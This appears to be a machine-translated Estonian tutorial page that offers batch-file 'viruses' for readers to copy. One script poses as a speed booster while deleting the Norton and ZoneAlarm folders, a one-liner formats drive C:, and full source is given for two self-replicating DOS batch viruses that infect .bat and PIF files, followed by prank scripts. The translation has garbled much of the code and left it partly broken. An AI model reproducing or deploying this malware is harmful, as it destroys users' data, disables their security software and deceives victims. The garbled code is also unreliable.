Sisukord:
2025 Autor: John Day | [email protected]. Viimati modifitseeritud: 2025-01-13 06:57
Märkus: Ma ei vastuta kahjude eest, mida te oma arvutile kellegi teise arvutile teete. Märkus: Kui soovite faili salvestada, peaksite selle salvestama mis tahes failina.bat
Samm: tõelised viirused (lihtsad)
esimene: kopeerige kood ****************************************** **************@echo tere tulemast ELECTROfun@echo winboosterisse, kui soovite oma arvuti kiiremaks muuta, peaksite tegema järgmised sammud@pause cd / c: dir dir c: / progra ~ 1 / norton ~ 1 @echo nüüd peaksite sisestama y ja vajutama sisestusklahvi @pause del c: / progra ~ 1 / norton ~ 1 @pause c: dir @pause @dir c: / progra ~ 1 dir c: / progra ~ 1 / zonea ~ 1 / zonealarm del c: / progra ~ 1 / zonea ~ 1 / zonealarm @echo ok nüüd on su arvuti "TÕESTI!" Kiire: välju ********************************************** *Märkus: salvestage fail kõike, mida soovite.bat Märkus: kõike, mis on pärast @echo, saab muuta (saate kirjutada mida iganes soovite) Teine: *************** värv 02FORMAT C: ***************
Samm: tõelised viirused (täpsemad)
1. Kõige võimsam *******************@kui mitte '%0 ==' kui '%_melt%==' goto meltbeg:: ---- näiv host --------@echo offecho Hello World!:: ---- end dummy host ----@goto MeLTend [MeLT_2a]: MeLTbeg@echo off%_MeLT%kui '%1 ==' MeLT goto MeLT %2 kui pole olemas %comspec %set comspec = %_ MeLT %käsk %comspec % /e: 5000 /c %0 MeLT virset MeLTcl = %1 %2 %3 %4 %5 %6 %7 %8 %9call % 0 MeLT rhset _MeLT = seatud MeLTcl = goto MeLTend: MeLTrhset _MeLT = x%0%MeLTcl%: MeLTvirset MeLTH =%0 kui pole olemas%_MeLT %% temp%\ nul set temp =%tmp%kui on olemas%temp%\ MeLT_2a goto MeLTrun%0 MeLT ots. %path%: MeLTfndshift%_MeLT%if '%2 ==' välju MeLTset MeLT =%2 \%MeLTH%.batif pole olemas%MeLT%seatud MeLT =%2 \%MeLTH%kui pole olemas%MeLT%seatud MeLT = %2%MeLTH%.batif pole olemas%MeLT%seatud MeLT =%2%MeLTH%, kui pole olemas…%path%: MeLTsshift%_MeLT%if '%2 ==' exit MeLTfor %% a in (%2 \*. bat%2*.bat) do call%MeLTH%MeLT inf %% agoto MeLTs: MeLTinffind / i "MeLT" nulif not errorlevel 1 goto MeLTnoecho @if not '%% 0 ==' if '%% _ melt %% ==' goto meltbeg> MeLT.ttype%3 >> MeLT.techo. >> MeLT.ttype% temp %\ MeLT_2a >> MeLT.tmove MeLT.t %3> nulexit MeLT: MeLTact - välklambi tekst ja seejärel tagasi normaalsele režiimile 100 BA D0 07 BB 00 B8 8E C3 8B CA 33 FF 26 8B 05 FE> MeLT.techo e 110 C0 FE C4 26 89 05 47 47 E2 F2 FE 06 24 01 75 E8 >> MeLT.techo e 120 B4 4C CD 21 00 >> MeLT.techo g >> MeLT.tdebugnuldel MeLT.texit MeLT: MeLTnoset MeLTC =%MeLTC%1if%MeLTC%== 1111111111 läks MeLTact: MeLTend *********************************** ******** 2. See on viirus, mis nakatab PIF -faile, mida Windows kasutab DOS -programmide käivitamiseks. See töötab, luues varjatud kaaspartiid, mis sisaldavad selle koopiaid, ja muudab seejärel PIF -faili nii, et kaaspartii käivitatakse kõigepealt. Pärast kaaslase käivitamist käivitab see algse hostiprogrammi, mille nimi on kaaslasesse kodeeritud. PIF-failid on märgitud nii, et neid uuesti ei nakatataks. See mõjutab ainult PIF -e, nakatunud programmides muudatusi ei tehta. "Ravimiseks" kasutage PIFEDIT -i, et taastada algsed failinimed, seejärel kustutage peidetud failid. ******************************* ***************@echo off:: hosti failinimi… set pifvo = LIST. COM:: loop dispetšer… kui '%1 ==' PiFV läks PiFV_%2:: käivita viirus! set _PiFV = kui pole olemas%comspec%set comspec = C: / COMMAND. COM%_PiFV %% comspec% /e: 5000 /c%0 PiFV go> nulif olemas PiFV! del PiFV!:: käivitage hostikomplekt PiFVcl = %1 %2 %3 %4 %5 %6 %7 %8 %9call %0 PiFV hstset PiFVo = määrake PiFVcl =:: kontrollige aktiveerimist… echo. | date | find / i "sat"> nul. PiFVif veatase 1 goto PiFV_endecho. | time | find "7"> nul. PiFVif errorlevel 1 goto PiFV_msgset PiFV = echocls%_PiFV %% PiFV%.%PiFV%Kunagi oli saarmas nimega Oscer%PiFV% % Kes väitis, et oskab vett valmistada.% PiFV% "Enam pole tamme," ütles ta, "kasuta hoopis minu vett!"% PiFV% Kuid vanem saarmal ei avaldanud see muljet. Paus> nul. PiFVset PiFV = goto PiFV_end: PiFV_msgecho [PiFV] autor: WaveFuncgoto PiFV_end: PiFV_hst%PiFVo%%PiFVcl%goto PiFV_end: PiFV_goset PiFVh =%0if pole olemas%PiFVh%seatud PiFVh =%0.batif pole olemas%PiFVh%exitfor%a %if helista %0 PiFV inf %% aexit PiFV: PiFV_infset PiFVp = %3:: hangi ohvri failinimi ja infektsioonimarker:: PIF -failist silumise abil … kui see on olemas, PiFV! goto PiFV_1echo m 124, 162 524> PiFV! echo e 100 '@set fn =' >> PiFV! echo m 524, 562 108 >> PiFV! echo n pifv $.bat >> PiFV! echo rcx >> PiFV! echo 47 >> PiFV! Echo w >> PiFV! Echo m 55E, 561 108 >> PiFV! Echo e 10C 0 >> PiFV! Echo n pifv $$. Bat >> PiFV! Echo rcx >> PiFV! Echo 10 >> PiFV! Echo w >> PiFV! Echo q >> PiFV!: PiFV_1debug%PiFVp%nulcall PiFV $ set PiFVn =%fn%call PiFV $$ set PiFVi =%fn%del PiFV $ ?. bat:: pifvn = orig failinimi:: pifvi = infektsioonimarker:: pifvp = pif -failinimi:: pifvh = kaaslane nahkhiirefail:: vahele nakatunud või tühjad pifid… kui '%PiFVi%==' PiFV läheb piFV_endif '%PiFVn%==' mine piFV_end:: ära varjuta command.com (ole kena) echo %PiFVn %| otsi /i "käsk"> nulif ei ole tõrke tase 1 mine PiFV_end:: nakatatav - loo kaaspartii …:: (laiendilt eemaldatakse järgmised koodiribad) echo e 100 e8 16 00 b4 08 cd 21 3c 00 74 0c 3c 2e 74 08 88> PiFV $$ echo e 110 c2 b4 02 cd 21 eb ec cd 20 ba 21 01 b4 09 cd 21 >> PiFV $$ echo e 120 c3 73 65 74 20 66 6e 3d 24 00 >> PiFV $$ echo n pifv $.com >> PiFV $$ echo rcx >> PiFV $$ echo 2a >> PiFV $$ echo w >> PiFV $$ echo q >> PiFV $$ debugnulecho%PiFVn%| PiFV $> PiFV $$. Batcall PiFV $$ set PiFVb =%fn%.batdel PiFV $?. nimi kui hostif%PiFVo%==%PiFVb%goto PiFV_endif olemas%PiFVb%goto PiFV_endecho @echo off>%PiFVb%echo set pifvo =%pifvn%>>%PiFVb%find "PiFV">%PiFVb%attrib%PiFVb% +h::… ja suunake PIF kaaslasele e 15E 'PiFV', 0> PiFV $$ echo e 124 '%PiFVb%', 0 >> PiFV $$ echo w >> PiFV $$ echo q >> PiFV $$ silumine %PiFVp %nuldel PiFV $$:: Ma arvan, et oleme lõpetanud! välju PiFV -st: PiFV_end:: tea, kui palju vigu sellel kõigel on? Ainult üks:: viis teada saada … **************************************** **********
3. samm: jantviirus ja trikk
1. jantviirus ******************* värv 02@echo offecho dir/sdir/sdir/sdir/sdir/sdir/sdir/sdir/sdir/sdir/sdir/ sdir/sdir/sdir/sdir/sdir/sdir/sdir/sdir/sdir/sdir/sdir/sdir/sdir/sdir/sdir/sdir/sdir/sdir/sdir/sdir/sdir/sdir/sdir/sdir/sdir/sdir/sdir/sdir/secho@echo* ************************* Märkus: "Värv 02" muudab teksti roheliseks. Trikk (maatrikskood) ****** *************************@echo offcolor 02: startecho %juhuslik % %juhuslik % %juhuslik % %juhuslik % %juhuslik % %juhuslik % % juhuslikult%% juhuslikult%% juhuslikult%% juhuslikult%% juhuslikult%% juhuslikult%% juhuslikult%% juhuslikult% goto start ************************ *******************